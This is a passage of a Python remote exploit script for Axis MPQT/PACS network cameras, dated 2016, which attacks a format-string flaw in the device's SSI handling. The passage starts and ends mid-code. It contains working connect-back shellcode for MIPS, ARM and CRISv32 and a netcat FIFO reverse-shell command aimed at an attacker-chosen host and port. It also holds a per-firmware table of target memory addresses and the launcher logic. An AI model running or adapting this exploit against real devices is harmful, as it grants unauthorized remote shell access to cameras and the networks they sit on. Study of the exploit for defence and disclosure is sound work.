\nhtml = (s.recv(4096)) # We really do not care whats coming back \n# if html: \n# print \"[i] Received:\",html \ns.shutdown(3) \ns.close() \nreturn html \n \n \ndef Send(self, uri): \n \n# The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually \n# matter for the functionality of this exploit, only for future references. \nheaders = { \n'User-Agent' : 'MSIE', \n} \n \n# Connect-timeout in seconds \ntimeout = 5 \nsocket.setdefaulttimeout(timeout) \n \nurl = '%s://%s%s' % (self.proto, self.host, uri) \n \nif self.verbose: \nprint \"[Verbose] Sending:\", url \n \nif self.proto == 'https': \nif hasattr(ssl, '_create_unverified_context'): \nprint \"[i] Creating SSL Default Context\" \nssl._create_default_https_context = ssl._create_unverified_context \n \nif self.credentials: \nBasic_Auth = self.credentials.split(':') \nif self.verbose: \nprint \"[Verbose] User:\",Basic_Auth[0],\"Password:\",Basic_Auth[1] \ntry: \npwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() \npwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1]) \nauth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr) \nopener = urllib2.build_opener(auth_handler) \nurllib2.install_opener(opener) \nexcept Exception as e: \nprint \"[!] Basic Auth Error:\",e \nsys.exit(1) \n \nif self.noexploit and not self.verbose: \nprint \"[<] 204 Not Sending!\" \nhtml = \"Not sending any data\" \nelse: \ndata = None \nreq = urllib2.Request(url, data, headers) \nrsp = urllib2.urlopen(req) \nif rsp: \nprint \"[<] %s OK\" % rsp.code \nhtml = rsp.read() \nreturn html \n \n \nclass shellcode_db: \n \ndef __init__(self,targetIP,verbose): \nself.targetIP = targetIP \nself.verbose = verbose \n \ndef sc(self,target): \nself.target = target \n \n \n# Connect back shellcode \n# \n# CRISv32: Written by myself, no shellcode availible out on \"The Internet\" \n# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators \n# MIPSel: Written by Jacob Holcomb (url encoded by me) \n# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php \n# \n# Slightly modified syscall's \nMIPSel = string.join([ \n#close stdin \n\"%ff%ff%04%28\" #slti a0,zero,-1 \n\"%a6%0f%02%24\" #li v0,4006 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n#close stdout \n\"%11%11%04%28\" #slti a0,zero,4369 \n\"%a6%0f%02%24\" #li v0,4006 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n#close stderr \n\"%fd%ff%0c%24\" #li t4,-3 \n\"%27%20%80%01\" #nor a0,t4,zero \n\"%a6%0f%02%24\" #li v0,4006 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n# socket AF_INET (2) \n\"%fd%ff%0c%24\" #li t4,-3 \n\"%27%20%80%01\" #nor a0,t4,zero \n\"%27%28%80%01\" #nor a1,t4,zero \n\"%ff%ff%06%28\" #slti a2,zero,-1 \n\"%57%10%02%24\" #li v0,4183 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n# \n\"%ff%ff%44%30\" # andi $a0, $v0, 0xFFFF \n# \n# dup2 stdout \n\"%c9%0f%02%24\" #li v0,4041 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n# \n# dup2 stderr \n\"%c9%0f%02%24\" #li v0,4041 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n# \n# Port \n\"PP1PP0%05%3c\" \n\"%01%ff%a5%34\" \n# \n\"%01%01%a5%20\" #addi a1,a1,257 \n\"%f8%ff%a5%af\" #sw a1,-8(sp) \n# \n# IP \n\"IP3IP4%05%3c\" \n\"IP1IP2%a5%34\" \n# \n\"%fc%ff%a5%af\" #sw a1,-4(sp) \n\"%f8%ff%a5%23\" #addi a1,sp,-8 \n\"%ef%ff%0c%24\" #li t4,-17 \n\"%27%30%80%01\" #nor a2,t4,zero \n\"%4a%10%02%24\" #li v0,4170 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n# \n\"%62%69%08%3c\" #lui t0,0x6962 \n\"%2f%2f%08%35\" #ori t0,t0,0x2f2f \n\"%ec%ff%a8%af\" #sw t0,-20(sp) \n\"%73%68%08%3c\" #lui t0,0x6873 \n\"%6e%2f%08%35\" #ori t0,t0,0x2f6e \n\"%f0%ff%a8%af\" #sw t0,-16(sp \n\"%ff%ff%07%28\" #slti a3,zero,-1 \n\"%f4%ff%a7%af\" #sw a3,-12(sp) \n\"%fc%ff%a7%af\" #sw a3,-4(sp \n\"%ec%ff%a4%23\" #addi a0,sp,-20 \n\"%ec%ff%a8%23\" #addi t0,sp,-20 \n\"%f8%ff%a8%af\" #sw t0,-8(sp) \n\"%f8%ff%a5%23\" #addi a1,sp,-8 \n\"%ec%ff%bd%27\" #addiu sp,sp,-20 \n\"%ff%ff%06%28\" #slti a2,zero,-1 \n\"%ab%0f%02%24\" #li v0,4011 (execve) \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n], '') \n \n# Working netcat shell \n# - $PATH will locate 'mkfifo', 'nc' and 'rm' \n# - LHOST / LPORT will be changed on the fly later in the code \n# - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting \n# - $IFS = <space><tab><newline> [By default, and we need <space> or <tab> as separator] \n# $ echo -n \"$IFS\" | hexdump -C \n# 00000000 20 09 0a \n# - $PS1 = $ [By default, and we need something to \"comment\" out our trailing FMS code from /bin/sh -c] \n# \n# '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator \n# \n# Working with Apache and Boa \n# NCSH = \"mkfifo$IFS/tmp/s;nc$IFS-w$IFS\\\"5\\\"$IFS\\\"LHOST\\\"$IFS\\\"LPORT\\\"$IFS0</tmp/s|/bin/sh>/tmp/s\\\"$IFS\\\"2>/tmp/s;rm$IFS/tmp/s;$PS1\" \nNCSH = \"mkfifo$IFS/tmp/s;nc$IFS-w$IFS\\\"5\\\"$IFS\\\"LHOST\\\"$IFS\\\"LPORT\\\"$IFS0</tmp/s|/bin/sh>/tmp/s;rm$IFS/tmp/s;$PS1\" \n \nARMel = string.join([ \n# original: http://shell-storm.org/shellcode/files/shellcode-754.php \n# 32-bit instructions, enter thumb mode \n\"%01%10%8f%e2\" # add r1, pc, #1 \n\"%11%ff%2f%e1\" # bx r1 \n \n# 16-bit thumb instructions follow \n# \n# socket(2, 1, 0) \n\"%02%20\" #mov r0, #2 \n\"%01%21\" #mov r1, #1 \n\"%92%1a\" #sub r2, r2, r2 \n\"%0f%02\" #lsl r7, r1, #8 \n\"%19%37\" #add r7, r7, #25 \n\"%01%df\" #svc 1 \n# \n# connect(r0, &addr, 16) \n\"%06%1c\" #mov r6, r0 \n\"%08%a1\" #add r1, pc, #32 \n\"%10%22\" #mov r2, #16 \n\"%02%37\" #add r7, #2 \n\"%01%df\" #svc 1 \n# \n# dup2(r0, 0/1/2) \n\"%3f%27\" #mov r7, #63 \n\"%02%21\" #mov r1, #2 \n# \n#lb: \n\"%30%1c\" #mov r0, r6 \n\"%01%df\" #svc 1 \n\"%01%39\" #sub r1, #1 \n\"%fb%d5\" #bpl lb \n# \n# execve(\"/bin/sh\", [\"/bin/sh\", 0], 0) \n\"%05%a0\" #add r0, pc, #20 \n\"%92%1a\" #sub r2, r2, r2 \n\"%05%b4\" #push {r0, r2} \n\"%69%46\" #mov r1, sp \n\"%0b%27\" #mov r7, #11 \n\"%01%df\" #svc 1 \n# \n\"%c0%46\" # .align 2 (NOP) \n\"%02%00\" # .short 0x2 (struct sockaddr) \n\"PP1PP0\" # .short 0x3412 (port: 0x1234) \n\"IP1IP2IP3IP4\" #.byte 192,168,57,1 (ip: 192.168.57.1) \n# .ascii \"/bin/sh\\0\\0\" \n\"%2f%62%69%6e\" # /bin \n\"%2f%73%68%00%00\" # /sh\\x00\\x00 \n\"%00%00%00%00\" \n\"%c0%46\" \n], '') \n \n \n# Connect-back shell for Axis CRISv32 \n# Written by mcw noemail eu 2016 \n# \nCRISv32 = string.join([ \n#close(0) \n\"%7a%86\" # clear.d r10 \n\"%5f%9c%06%00\" # movu.w 0x6,r9 \n\"%3d%e9\" # break 13 \n#close(1) \n\"%41%a2\" # moveq 1,r10 \n\"%5f%9c%06%00\" # movu.w 0x6,r9 \n\"%3d%e9\" # break 13 \n#close(2) \n\"%42%a2\" # moveq 2,r10 \n\"%5f%9c%06%00\" # movu.w 0x6,r9 \n\"%3d%e9\" # break 13 \n# \n\"%10%e1\" # addoq 16,sp,acr \n\"%42%92\" # moveq 2,r9 \n\"%df%9b\" # move.w r9,[acr] \n\"%10%e1\" # addoq 16,sp,acr \n\"%02%f2\" # addq 2,acr \n#PORT \n\"%5f%9ePP1PP0\" # move.w 0xPP1PP0,r9 # \n\"%df%9b\" # move.w r9,[acr] \n\"%10%e1\" # addoq 16,sp,acr \n\"%6f%96\" # move.d acr,r9 \n\"%04%92\" # addq 4,r9 \n#IP \n\"%6f%feIP1IP2IP3IP4\" # move.d IP4IP3IP2IP1,acr \n\"%e9%fb\" # move.d acr,[r9] \n# \n#socket() \n\"%42%a2\" # moveq 2,r10 \n\"%41%b2\" # moveq 1,r11 \n\"%7c%86\" # clear.d r12 \n\"%6e%96\" # move.d $sp,$r9 \n\"%e9%af\" # move.d $r10,[$r9+] \n\"%e9%bf\" # move.d $r11,[$r9+] \n\"%e9%cf\" # move.d $r12,[$r9+] \n\"%41%a2\" # moveq 1,$r10 \n\"%6e%b6\" # move.d $sp,$r11 \n\"%5f%9c%66%00\" # movu.w 0x66,$r9 \n\"%3d%e9\" # break 13 \n# \n\"%6a%96\" # move.d $r10,$r9 \n\"%0c%e1\" # addoq 12,$sp,$acr \n\"%ef%9b\" # move.d $r9,[$acr] \n\"%0c%e1\" # addoq 12,$sp,$acr \n\"%6e%96\" # move.d $sp,$r9 \n\"%10%92\" # addq 16,$r9 \n\"%6f%aa\" # move.d [$acr],$r10 \n\"%69%b6\" # move.d $r9,$r11 \n\"%50%c2\" # moveq 16,$r12 \n# \n# connect() \n\"%6e%96\" # move.d $sp,$r9 \n\"%e9%af\" # move.d $r10,[$r9+] \n\"%e9%bf\" # move.d $r11,[$r9+] \n\"%e9%cf\" # move.d $r12,[$r9+] \n\"%43%a2\" # moveq 3,$r10 \n\"%6e%b6\" # move.d $sp,$r11 \n\"%5f%9c%66%00\" # movu.w 0x66,$r9 \n\"%3d%e9\" # break 13 \n# dup(0) already in socket \n#dup(1) \n\"%6f%aa\" # move.d [$acr],$r10 \n\"%41%b2\" # moveq 1,$r11 \n\"%5f%9c%3f%00\" # movu.w 0x3f,$r9 \n\"%3d%e9\" # break 13 \n# \n#dup(2) \n\"%6f%aa\" # move.d [$acr],$r10 \n\"%42%b2\" # moveq 2,$r11 \n\"%5f%9c%3f%00\" # movu.w 0x3f,$r9 \n\"%3d%e9\" # break 13 \n# \n#execve(\"/bin/sh\",NULL,NULL) \n\"%90%e2\" # subq 16,$sp \n\"%6e%96\" # move.d $sp,$r9 \n\"%6e%a6\" # move.d $sp,$10 \n\"%6f%0e%2f%2f%62%69\" # move.d 69622f2f,$r0 \n\"%e9%0b\" # move.d $r0,[$r9] \n\"%04%92\" # addq 4,$r9 \n\"%6f%0e%6e%2f%73%68\" # move.d 68732f6e,$r0 \n\"%e9%0b\" # move.d $r0,[$r9] \n\"%04%92\" # addq 4,$r9 \n\"%79%8a\" # clear.d [$r9] \n\"%04%92\" # addq 4,$r9 \n\"%79%8a\" # clear.d [$r9] \n\"%04%92\" # addq 4,$r9 \n\"%e9%ab\" # move.d $r10,[$r9] \n\"%04%92\" # addq 4,$r9 \n\"%79%8a\" # clear.d [$r9] \n\"%10%e2\" # addq 16,$sp \n\"%6e%f6\" # move.d $sp,$acr \n\"%6e%96\" # move.d $sp,$r9 \n\"%6e%b6\" # move.d $sp,$r11 \n\"%7c%86\" # clear.d $r12 \n\"%4b%92\" # moveq 11,$r9 \n\"%3d%e9\" # break 13 \n], '') \n \n \nif self.target == 'MIPSel': \nreturn MIPSel \nelif self.target == 'ARMel': \nreturn ARMel \nelif self.target == 'CRISv32': \nreturn CRISv32 \nelif self.target == 'NCSH1': \nreturn NCSH \nelif self.target == 'NCSH2': \nreturn NCSH \nelse: \nprint \"[!] Unknown shellcode! (%s)\" % str(self.target) \nsys.exit(1) \n \n \nclass FMSdb: \n \ndef __init__(self,targetIP,verbose): \nself.targetIP = targetIP \nself.verbose = verbose \n \ndef FMSkey(self,target): \nself.target = target \n \ntarget_db = { \n \n#----------------------------------------------------------------------- \n# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH) \n#----------------------------------------------------------------------- \n \n# \n# Using POP format string, AKA 'Old Style' \n# \n# MPQT \n'MIPS-5.85.x': [ \n0x41f370, # Adjust to GOT free() address \n0x420900, # .bss shellcode address \n2, # 1st POP's \n2, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.40.3': [ \n0x41e41c, # Adjust to GOT free() address \n0x4208cc, # .bss shellcode address \n7, # 1st POP's \n11, # 2nd POP's \n'ax', # Aligns injected code \n450, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.4x': [ \n0x41e4cc, # Adjust to GOT free() address \n0x42097c, # .bss shellcode address \n7, # 1st POP's \n11, # 2nd POP's \n'ax', # Aligns injected code \n450, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.5x': [ \n0x41d11c, # Adjust to GOT free() address \n0x41f728, # .bss shellcode address \n5, # 1st POP's \n15, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.55x': [ \n0x41d11c, # Adjust to GOT free() address \n0x41f728, # .bss shellcode address \n11, # 1st POP's \n9, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# Shared with MPQT and PACS \n'MIPS-5.6x': [ \n0x41d048, # Adjust to GOT free() address \n0x41f728, # .bss shellcode address \n5, # 1st POP's \n15, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n \n], \n \n# MPQT \n'MIPS-5.7x': [ \n0x41d04c, # Adjust to GOT free() address \n0x41f718, # .bss shellcode address \n2, # 1st POP's \n14, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.75x': [ \n0x41c498, # Adjust to GOT free() address \n0x41daf0, # .bss shellcode address \n3, # 1st POP's \n13, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# Shared with MPQT and PACS \n'MIPS-5.8x': [ \n0x41d0c0, # Adjust to GOT free() address \n0x41e740, # .bss shellcode address \n3, # 1st POP's \n13, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.9x': [ \n0x41d0c0, # Adjust to GOT free() address \n0x41e750, # .bss shellcode address \n3, # 1st POP's \n13, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-6.1x': [ \n0x41c480, # Adjust to GOT free() address \n0x41dac0, # .bss shellcode address \n3, # 1st POP's \n13, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-6.2x': [ \n0x41e578, # Adjust to GOT free() address \n0x41fae0, # .bss shellcode address \n2, # 1st POP's \n2, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-6.20x': [ \n0x41d0c4, # Adjust to GOT free() address \n0x41e700, # .bss shellcode address \n3, # 1st POP's \n13, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# PACS \n'MIPS-1.3x': [ \n0x41e4cc, # Adjust to GOT free() address \n0x420a78, # .bss shellcode address \n7, # 1st POP's \n11, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# PACS \n'MIPS-1.1x': [ \n0x41e268, # Adjust to GOT free() address \n0x420818, # .bss shellcode address \n7, # 1st POP's \n11, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# \n# Tested with execstack to set executable stack flag bit on bin's and lib's \n# \n# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working. \n# \n \n# ARMel with bin/libs executable stack flag set with 'execstack' \n# MPQT \n'ARM-5.50x': [ # \n0x1c1b4, # Adjust to GOT free() address \n0x1e7c8, # .bss shellcode address \n93, # 1st POP's \n1, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'ARMel' # Shellcode type (ARMel) \n], \n \n# ARMel with bin/libs executable stack flag set with 'execstack' \n# MPQT \n'ARM-5.55x': [ # \n0x1c15c, # Adjust to GOT free() address \n0x1e834, # .bss shellcode address \n59, # 1st POP's \n80, # 2nd POP's \n'axis', # Aligns injected code \n800, # How big buffer before shellcode \n'ARMel' # Shellcode type (ARMel) \n], \n \n# \n# Using direct parameter access format string, AKA 'New Style' \n# \n# MPQT \n'ARM-NCSH-5.20x': [ # AXIS P1311 5.20 (id=root) \n0x1c1b4, # Adjust to GOT free() address \n0x10178, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n61, # 1st POP's \n115, # 2nd POP's \n143, # 3rd POP's \n118, # 4th POP's \n'NCSH2' # Shellcode type (Netcat Shell) \n], \n \n# MPQT \n'ARM-NCSH-5.2x': [ # \n0x1c1b4, # Adjust to GOT free() address \n0x1013c, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n61, # 1st POP's \n115, # 2nd POP's \n143, # 3rd POP's \n118, # 4th POP's \n'NCSH2' # Shellcode type (Netcat Shell) \n], \n \n# MPQT \n'ARM-NCSH-5.4x': [ # \n0x1c1b4, # Adjust to GOT free() address \n0x101fc, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n61, # 1st POP's \n115, # 2nd POP's \n143, # 3rd POP's \n118, # 4th POP's \n'NCSH2' # Shellcode type (Netcat Shell) \n], \n# \n# Using POP format string, AKA 'Old Style' \n# \n \n# MPQT \n'ARM-NCSH-5.5x': [ # \n0x1c15c, # Adjust to GOT free() address \n0xfdcc, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n97, # 1st POP's \n0, # 2nd POP's \n41, # 3rd POP's \n0, # 4th POP's \n'NCSH1' # Shellcode type (Netcat Shell) \n], \n \n# MPQT \n'ARM-NCSH-5.6x': [ # \n0x1c15c, # Adjust to GOT free() address \n0xfcec, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n97, # 1st POP's \n0, # 2nd POP's \n41, # 3rd POP's \n0, # 4th POP's \n'NCSH1' # Shellcode type (Netcat Shell) \n], \n \n# MPQT \n'ARM-NCSH-5.7x': [ # \n0x1c1c0, # Adjust to GOT free() address \n0xf800, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n132, # 1st POP's \n0, # 2nd POP's \n34, # 3rd POP's \n0, # 4th POP's \n'NCSH1' # Shellcode type (Netcat Shell) \n], \n \n# Will go in endless loop after exit of nc shell... DoS sux \n# MPQT \n'ARM-NCSH-5.8x': [ # \n0x1b39c, # Adjust to GOT free() address \n0xf8c0, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n98, # 1st POP's \n0, # 2nd POP's \n34, # 3rd POP's \n1, # 4th POP's \n'NCSH1' # Shellcode type (Netcat Shell) \n], \n \n# MPQT \n'ARM-NCSH-6.1x': [ # \n0x1d2a4, # Adjust to GOT free() address \n# 0xecc4, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n0xecc8, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n106, # 1st POP's \n0, # 2nd POP's \n34, # 3rd POP's \n1, # 4th POP's \n'NCSH1' # Shellcode type (Netcat Shell) \n], \n# \n# Using POP format string, AKA 'Old Style' \n# \n \n# MPQT \n'CRISv32-5.5x': [ # \n0x8d148, # Adjust to GOT free() address \n0x8f5a8, # .bss shellcode address \n4, # 1st POP's \n13, # 2nd POP's \n'axis', # Aligns injected code \n470, # How big buffer before shellcode \n'CRISv32' # Shellcode type (Crisv32) \n], \n \n# MPQT \n'CRISv32-5.4x': [ # \n0x8d0e0, # Adjust to GOT free() address \n0x8f542, # .bss shellcode address \n4, # 1st POP's \n13, # 2nd POP's \n'axis', # Aligns injected code \n470, # How big buffer before shellcode \n'CRISv32' # Shellcode type (Crisv32) \n], \n \n# MPQT \n'CRISv32-5.2x': [ # \n0x8d0b4, # Adjust to GOT free() address \n0x8f4d6, # .bss shellcode address \n4, # 1st POP's \n13, # 2nd POP's \n'axis', # Aligns injected code \n470, # How big buffer before shellcode \n'CRISv32' # Shellcode type (Crisv32) \n], \n \n# MPQT \n'CRISv32-5.20.0': [ # \n0x8d0e4, # Adjust to GOT free() address \n0x8f546, # .bss shellcode address \n4, # 1st POP's \n13, # 2nd POP's \n'axis', # Aligns injected code \n470, # How big buffer before shellcode \n'CRISv32' # Shellcode type (Crisv32) \n] \n \n \n} \n \nif self.target == 0: \nreturn target_db \n \nif not self.target in target_db: \nprint \"[!] Unknown FMS key: %s!\" % self.target \nsys.exit(1) \n \nif self.verbose: \nprint \"[Verbose] Number of availible FMS keys:\",len(target_db) \n \nreturn target_db \n \n \n# \n# Validate correctness of HOST, IP and PORT \n# \nclass Validate: \n \ndef __init__(self,verbose): \nself.verbose = verbose \n \n# Check if IP is valid \ndef CheckIP(self,IP): \nself.IP = IP \n \nip = self.IP.split('.') \nif len(ip) != 4: \nreturn False \nfor tmp in ip: \nif not tmp.isdigit(): \nreturn False \ni = int(tmp) \nif i < 0 or i > 255: \nreturn False \nreturn True \n \n# Check if PORT is valid \ndef Port(self,PORT): \nself.PORT = PORT \n \nif int(self.PORT) < 1 or int(self.PORT) > 65535: \nreturn False \nelse: \nreturn True \n \n# Check if HOST is valid \ndef Host(self,HOST): \nself.HOST = HOST \n \ntry: \n# Check valid IP \nsocket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP \n# Or we check again if it is correct typed IP \nif self.CheckIP(self.HOST): \nreturn self.HOST \nelse: \nreturn False \nexcept socket.error as e: \n# Else check valid DNS name, and use the IP address \ntry: \nself.HOST = socket.gethostbyname(self.HOST) \nreturn self.HOST \nexcept socket.error as e: \nreturn False \n \n \n \nif __name__ == '__main__': \n \n# \n# Help, info and pre-defined values \n# \nINFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis <mcw noemail eu>]' \nHTTP = \"http\" \nHTTPS = \"https\" \nproto = HTTP \nverbose = False \nnoexploit = False \nlhost = '192.168.0.1' # Default Local HOST \nlport = '31337' # Default Local PORT \nrhost = '192.168.0.90' # Default Remote HOST \nrport = '80' # Default Remote PORT \n# Not needed for the SSI exploit, here for possible future usage. \n# creds = 'root:pass' \ncreds = False \n \n# \n# Try to parse all arguments \n# \ntry: \narg_parser = argparse.ArgumentParser( \n# prog=sys.argv[0], \nprog='axis-ssid-PoC.py', \ndescription=('[*]' + INFO + '\\n')) \narg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']') \narg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']') \narg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']') \narg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']') \narg_parser.add_argument('--fms', required=False, help='Manual FMS key') \nif creds: \narg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']') \narg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]') \narg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]') \narg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]') \narg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose') \nargs = arg_parser.parse_args() \nexcept Exception as e: \nprint INFO,\"\\nError: %s\\n\" % str(e) \nsys.exit(1) \n \n# We want at least one argument, so print out help \nif len(sys.argv) == 1: \narg_parser.parse_args(['-h']) \n \nprint \"\\n[*]\",INFO \n \nif args.verbose: \nverbose = args.verbose \n \n# Print out info from dictionary \nif args.dict: \ntarget = FMSdb(rhost,verbose).FMSkey(0) \nprint \"[db] Number of FMS keys:\",len(target) \n \n# Print out detailed info from dictionary \nif verbose: \n \nprint \"[db] Target details of FMS Keys availible for manual xploiting\" \nprint \"\\n[FMS Key]\\t[GOT Address]\\t[BinSh Address]\\t[POP1]\\t[POP2]\\t[POP3]\\t[POP4]\\t[Shellcode]\" \n \nfor tmp in range(0,len(target)): \nKey = sorted(target.keys())[tmp] \ntemp = re.split('[-]',Key)[0:10] \n \nif temp[1] == 'NCSH': \nprint Key,'\\t','0x{:08x}'.format(target[Key][0]),'\\t','0x{:08x}'.format(target[Key][1]),'\\t',target[Key][2],'\\t',target[Key][3],'\\t',target[Key][4],'\\t',target[Key][5],'\\t',target[Key][6] \n \nprint \"\\n[FMS Key]\\t[GOT Address]\\t[BSS Address]\\t[POP1]\\t[POP2]\\t[Align]\\t[Buf]\\t[Shellcode]\" \nfor tmp in range(0,len(target)): \nKey = sorted(target.keys())[tmp] \ntemp = re.split('[-]',Key)[0:10] \n \nif temp[1] != 'NCSH': \nprint Key,'\\t','0x{:08x}'.format(target[Key][0]),'\\t','0x{:08x}'.format(target[Key][1]),'\\t',target[Key][2],'\\t',target[Key][3],'\\t',len(target[Key][4]),'\\t',target[Key][5],'\\t',target[Key][6] \n \nprint \"\\n\" \nelse: \nprint \"[db] Target FMS Keys availible for manual xploiting instead of using auto mode:\" \nKey = \"\" \nfor tmp in range(0,len(target)): \nKey += sorted(target.keys())[tmp] \nKey += ', ' \nprint '\\n',Key,'\\n' \nsys.exit(0) \n \n# \n# Check validity, update if needed, of provided options \n# \nif args.https: \nproto = HTTPS \nif not args.rport: \nrport = '443' \n \nif creds and args.auth: \ncreds = args.auth \n \nif args.noexploit: \nnoexploit = args.noexploit \n \nif args.rport: \nrport = args.rport \n \nif args.rhost: \nrhost = args.rhost \n \nif args.lport: \nlport = args.lport \n \nif args.lhost: \nlhost = args.lhost \n \n# Check if LPORT is valid \nif not Validate(verbose).Port(lport): \nprint \"[!] Invalid LPORT - Choose between 1 and 65535\" \nsys.exit(1) \n \n# Check if RPORT is valid \nif not Validate(verbose).Port(rport): \nprint \"[!] Invalid RPORT - Choose between 1 and 65535\" \nsys.exit(1) \n \n# Check if LHOST is valid IP or FQDN, get IP back \nlhost = Validate(verbose).Host(lhost) \nif not lhost: \nprint \"[!] Invalid LHOST\" \nsys.exit(1) \n \n# Check if RHOST is valid IP or FQDN, get IP back \nrhost = Validate(verbose).Host(rhost) \nif not rhost: \nprint \"[!] Invalid RHOST\" \nsys.exit(1) \n \n \n# \n# Validation done, start print out stuff to the user \n# \nif noexploit: \nprint \"[i] Test mode selected, no exploiting...\" \nif args.https: \nprint \"[i] HTTPS / SSL Mode Selected\" \nprint \"[i] Remote target IP:\",rhost \nprint \"[i] Remote target PORT:\",rport \nprint \"[i] Connect back IP:\",lhost \nprint \"[i] Connect back PORT:\",lport \n \nrhost = rhost + ':' + rport \n \n# \n# FMS key is required into this PoC \n# \nif not args.fms: \nprint \"[!] FMS key is required!\" \nsys.exit(1) \nelse: \nKey = args.fms \nprint \"[i] Trying with FMS key:\",Key \n \n# \n# Prepare exploiting \n# \n# Look up the FMS key in dictionary and return pointer for FMS details to use \ntarget = FMSdb(rhost,verbose).FMSkey(Key) \n \nif target[Key][6] == 'NCSH1': \nNCSH1 = target[Key][6] \nNCSH2 = \"\" \nelif target[Key][6] == 'NCSH2': \nNCSH2 = target[Key][6] \nNCSH1 = \"\" \nelse: \nNCSH1 = \"\" \nNCSH2 = \"\" \n \nif Key == 'ARM-NCSH-5.8x': \nprint \"\\nExploit working, but will end up in endless loop after exiting remote NCSH\\nDoS sux, so I'm exiting before that shit....\\n\\n\" \nsys.exit(0) \n \nprint \"[i] Preparing shellcode:\",str(target[Key][6]) \n \n# We don't use url encoded shellcode with Netcat shell \n# This is for MIPS/CRISv32 and ARM shellcode \nif not NCSH1 and not NCSH2: \nFMSdata = target[Key][4] # This entry aligns the injected shellcode \n \n# Building up the url encoded shellcode for sending to the target, \n# and replacing LHOST / LPORT in shellcode to choosen values \n \n# part of first 500 decoded bytes will be overwritten during stage #2, and since \n# there is different 'tailing' on the request internally, keep it little more than needed, to be safe. \n# Let it be 0x00, just for fun. \nFMSdata += '%00' * target[Key][5] \n \n# Connect back IP to url encoded \nip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.'))) \nip_hex = ip_hex.split() \nIP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3]; \n \n# Let's break apart the hex code of LPORT into two bytes \nport_hex = hex(int(lport))[2:] \nport_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2) \nport_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2)) \nport_hex = port_hex.split() \n \nif (target[Key][6]) == 